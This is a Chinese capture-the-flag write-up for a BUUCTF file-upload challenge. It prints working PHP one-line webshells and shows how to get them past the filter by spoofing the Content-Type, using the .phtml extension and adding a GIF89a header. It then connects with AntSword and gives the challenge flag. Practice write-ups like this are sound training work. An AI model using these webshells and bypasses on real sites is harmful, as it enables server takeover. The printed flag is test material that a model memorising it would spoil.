BUUCTF | [极客大挑战 2019]Upload

步骤👇

打开环境是一个上传图片的页面。

先上传一句话木马试试，这里格式直接不变，先上传看看。

<?php
@eval($_POST[x]);
?>

 

提示说不是图片，需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg

 

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht

前几个php格式的一句话都被b了，比如php、php3等
将文件格式改到phtml可以了，但带<?的一句话都不行

换个一句话木马

GIF89a? <script language="php">eval($_REQUEST[lx])</script>

然后改为phtml格式文件

然后上传，抓包改文件格式为image/jpeg，上传成功。

现在需要知道图片的保存路径了。
一般都是/upload
访问一下

http://ecc33fb9-fb4f-499b-83c4-921188260a3f.node3.buuoj.cn/upload/

还真有

这样就好办了，拿蚁剑连接吧。

路径就是/upload
密码就是一句话木马中request里面的内容，我的是lx
连接成功

flag在根目录里面


flag{d8c839e5-3aa7-40db-9899-858007fc3778}